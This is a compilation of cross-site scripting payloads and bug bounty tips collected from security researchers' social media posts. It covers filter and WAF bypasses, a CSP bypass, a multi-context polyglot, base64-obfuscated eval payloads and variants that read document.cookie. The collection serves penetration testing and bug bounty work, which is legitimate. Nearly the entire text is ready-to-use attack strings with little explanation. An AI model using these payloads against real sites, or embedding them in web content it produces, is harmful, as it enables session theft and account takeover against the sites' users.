<img ="=" title="><img src=1 onerror=alert(1)>"
<<img src=x onerror='prompt(1)'<
#BugBountyTip When you are dealing with XSS try to change the device or user-agent to Mobile you might get it work, in my case the homepage is different in devices the XSS is in username and the payload is Unicode UTF-16
XSS vector without >, \, 'alert', parentheses, quotes and spaces <svg/onload=t=/aler/.source+/t/.source;window.onerror=window[t];throw+1;//
thank you
@brutelogic
...WAF Bypass: "><brute+onbeforescriptexecute=a=alert,a(1%26%23x29> #security #XSS #KNOXSS
onffocusofocuscfocusufocuss="prompt(1)" - useful when waf replaces things like 'focus' to null, leaving us with onfocus="prompt(1)" - https://twitter.com/zseano/status/837160885181243392
?x=<script%20src=data:&x=alert(1);>
One that should bypass some XSS filters, by
@dsopas
<meter onmouseover="alert(1)"
Uppercase #XSS
<SVG ONLOAD=alert(1)>
http://brutelogic.com.br/webgun/test.php?p=%3CSVG%20ONLOAD=%26%2397%26%23108%26%23101%26%23114%26%23116%281%29%3E
XSS bypass for a weak filter - riyaz walikar
<img src=x onerror="[]['constructor']['constructor']('ale'+'rt(0)')()">
var of "Function ('ale'+'rt(0)')()"
<svg>
<a xml:base="javascript:alert(1)//" href="#"><circle r="100" />
</svg>
//Firefox :) .- https://twitter.com/kinugawamasato/status/898950198826721280
#XSS Tip Smiling face with sunglasses
I guess this one could solve all your HTMLi problems (regular, inline & JS block)
'"</Script><Html Onmouseover=(alert)(1) // - https://twitter.com/brutelogic/status/903987636448219136
This might lead to some fun XSS on status-code errors:
header("HTTP/1.0 999 <img src=x onerror=alert(1)>"); - https://twitter.com/fransrosen/status/912795907313356800
SomeTime It's Work!
#XSS #Payload
<sVg/oNloAd="JaVaScRiPt:/**\/*\'/"\eval(atob('Y29uZmlybShkb2N1bWVudC5kb21haW4pOw=='))">
<iframe src=jaVaScrIpT:eval(atob('Y29uZmlybShkb2N1bWVudC5kb21haW4pOw=='))>
"><svg/onload=alert(1)>
<img>/><svg/onload=alert(1)>
"></\/\</script><script>alert(1)</script>
"><script>alert("xss");</script>
<div onmouseover="alert('XSS');">Hello :)
^ [My favorite one - works like 80% of the time for me].
</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
That's all for now that I'll share.
Enjoy the payloads too. ;)
x@x.com<--`<img/src=` onerror=alert("Friendly-XSS")> --!>
or
<--`<img/src=` onerror=alert("Friendly-XSS")> --!>
https://twitter.com/DaherMohamed4/status/1277009961688719360
To test XSS + SQLi + SSTI/CSTI with the same payload use :
'"><svg/onload=prompt(5);>{{7*7}}
' ==> for Sql injection
"><svg/onload=prompt(5);> ==> for XSS
{{7*7}} ==> for SSTI/CSTI
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
CSP Bypass, script-src 'self' data:
<script ?/src="data:+,\u0061lert%281%29">/</script>
When you find input field which allows " (quotes), try this payload:
"autofocus onfocus=alert(1)// -> Doesn't work
"type%3d"text"autofocus%20onfocus%3d"alert(1)" -> Works
Finally found my first bug on
@synack
..I am just loving it.
Bug: XSS through file upload.
Payload: */alert(1)</script><script>/*
https://twitter.com/ManasH4rsh/status/1358742847789232128?s=20
There is so much to learn about HTML and JS hacks from this code:
<svg/onload=throw/**/Uncaught=window.onerror=eval,";alert\501\51">
This is inspired by
@garethheyes
and will execute an 'alert(1)' without using parentheses, spaces or quotes!
The Best XSS Polyglot! Police cars revolving lightPolice cars revolving light
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
</stYle/</titLe/</teXtarEa/</scRipt/--!><h1>aa</h1>\x3csVg/<sVg/oNloAd=alert()//>\x3e
</a><a href=https://www.google.com>Test</a>
\"><<img onerror=alert(49609) src>
"><<img onerror=alert(49609) src>
https://github.com/TheKingOfDuck/easyXssPayload/blob/master/burpXssPayload.txt
HTML INJECTION + XSS INJECTION Heavy check mark
/<div+id=JavaScript>/<h1>_Y000!_
/<div+id=JavaScript>/<marquee>_Y000!_</marquee>
/<div+id=JavaScript>/<marquee onstart=alert`_Y000!_`>_Y000!_</marquee>
Url/?color=
Payloas
"><svg/onload=alert(document.domain)>"
Url/?language=
Payload
%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
Url/?redirect_url=
Payload
javascript:alert()
Without ">" (XSS)
<svg onload='alert(1)'
<svg onload="alert(1)"
<svg onload=alert(1)//
<svg onload=alert(1)+
<svg onload=alert(1)<!--
<opening_tag>PAYLOAD</closing_tag>
<svg onload=alert(1)%20
<svg onload=alert(1)%0A
<svg onload=alert(1)%0C
<svg onload=alert(1)%0D
<svg onload=alert(1)%09
<opening_tag>PAYLOAD</closing_tag>
Bug : RXss
Payload : "'`><\x00img src=xxx:x onerror=javascript:alert(1)>
Final payload:
<svg><animate onend=a\u006cert(1) dur=1s>
The final payload :
<a class="w-100" href=javascript:alert(document.cookie) // target=_self target="_blank">
Paylaod - \">'>\"><img/src/onerror=confirm(document.cookie)>
Cross mark "'><H1 on*>1
White heavy check mark "'><H1>1
Mi payload final fué:
"><details/open/ontoggle=prompt("/xss_by_Y000!/")>
<input/onfocus=prompt(document.domain) autofocus>
Some payloads that worked for me in popping up a stored XSS:-
1. <img src=`xx:xx`onerror=alert(1)>
2. <div/onmouseover='alert(1)'> style="x:">
3. \";alert('XSS');//
4. "autofocus/onfocus=alert(1)//
5. '-alert(1)-'
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/XSS/XSS-OFJAAAH.txt
“><<img onerror=alert(document.cookie) src>
